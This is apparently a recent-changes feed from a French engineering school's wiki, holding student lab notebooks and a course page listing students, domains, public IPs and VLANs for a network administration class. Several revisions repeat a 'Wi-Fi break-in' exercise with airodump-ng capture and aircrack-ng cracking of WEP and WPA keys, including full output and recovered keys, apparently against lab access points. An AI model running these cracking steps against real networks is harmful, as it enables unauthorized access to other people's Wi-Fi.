&amp;lt;/syntaxhighlight&amp;gt;Puis dans le terminal, on utilise les commandes suivantes (à ne surtout pas utiliser sur capbreton !!)&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvda3 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On peut maintenant relancer la machine pour verifier si la config reste.&lt;br /&gt;
&lt;br /&gt;
Enfin on répète le même schéma pour la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
==== Adresses ipv4 et ipv6 ====&lt;br /&gt;
Tout d'abord dans notre machine des service, on donne une adresse ipv4 local et ipv6, on modifie donc le fichier /etc/network/interfaces :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.10.2/24&lt;br /&gt;
    gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On va aussi ajouter le bridge depuis capbreton dans /etc/xen/SE4.Manjaro.cfg:&amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Et dans la machine mandataire on va donner une adresse ipv4 du reseau publique :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo                                                                             &lt;br /&gt;
iface lo inet loopback                                                              &lt;br /&gt;
&lt;br /&gt;
auto eth0                                                                           &lt;br /&gt;
iface eth0 inet static                                                              &lt;br /&gt;
        address 192.168.10.1/24                                                     &lt;br /&gt;
&lt;br /&gt;
auto eth1                                                                           &lt;br /&gt;
iface eth1 inet static                                                              &lt;br /&gt;
        address 193.48.57.166/24                                                    &lt;br /&gt;
        gateway 193.48.57.162                                                       &lt;br /&gt;
iface eth1 inet6 auto                                                               &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Effraction WIFI ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On trouve cracotte06 avec son adresse et son chanel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le fichier dump étant crée, on récupère la clé avec la commande suivante :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                                                                                     Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) &lt;br /&gt;
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) &lt;br /&gt;
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) &lt;br /&gt;
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) &lt;br /&gt;
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                               Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 13 minutes, 48 seconds                         66.97%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66684666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD &lt;br /&gt;
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12194</id>
		<title>Atelier SysRes SE4 2025/2026 E6</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12194"/>
		<updated>2026-02-10T16:16:37Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Effraction WIFI ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On trouve cracotte06 avec son adresse et son chanel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le fichier dump étant crée, on récupère la clé avec la commande suivante :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                                                                                     Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) &lt;br /&gt;
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) &lt;br /&gt;
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) &lt;br /&gt;
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) &lt;br /&gt;
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                               Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 13 minutes, 48 seconds                         66.97%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66684666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD &lt;br /&gt;
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12142</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12142"/>
		<updated>2026-02-10T14:08:18Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : /* Tableau des réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|SALHI&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.20.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GOURVEST/GHAZALI&lt;br /&gt;
|pont_diviseur&lt;br /&gt;
|192.168.67.0/24&lt;br /&gt;
|-&lt;br /&gt;
|YAHIANI / TEPELI&lt;br /&gt;
|pontclio&lt;br /&gt;
|192.168.7.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GAUTHIER / SOUOP METSE&lt;br /&gt;
|pont_rock&lt;br /&gt;
|192.168.50.0/24&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|E1_Pierre&lt;br /&gt;
|11&lt;br /&gt;
|-&lt;br /&gt;
|E2_Agathe&lt;br /&gt;
|12&lt;br /&gt;
|-&lt;br /&gt;
|E5_Cedric&lt;br /&gt;
|15&lt;br /&gt;
|-&lt;br /&gt;
|E6_Thomas&lt;br /&gt;
|16&lt;br /&gt;
|-&lt;br /&gt;
|E15_MSalhi&lt;br /&gt;
|25&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 || 172.27.0.1/16&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 || 172.27.0.2/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 || 172.27.0.3/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 || 172.27.0.4/16&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12135</id>
		<title>Atelier SysRes SE4 2025/2026 E6</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12135"/>
		<updated>2026-02-10T13:37:28Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : Page créée avec « === Effraction WIFI === &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt; sudo airodump-ng wlan1 &amp;lt;/syntaxhighlight&amp;gt;On trouve cracotte06 avec son adresse et son chanel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt; sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4  &amp;lt;/syntaxhighlight&amp;gt;Le fichier dump étant crée, on récupère la clé avec la commande suivante :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt; sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap &amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;... »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Effraction WIFI ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On trouve cracotte06 avec son adresse et son chanel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le fichier dump étant crée, on récupère la clé avec la commande suivante :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                                                                                     Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) &lt;br /&gt;
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) &lt;br /&gt;
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) &lt;br /&gt;
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) &lt;br /&gt;
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11362</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11362"/>
		<updated>2026-01-26T07:43:22Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || || SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || || SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
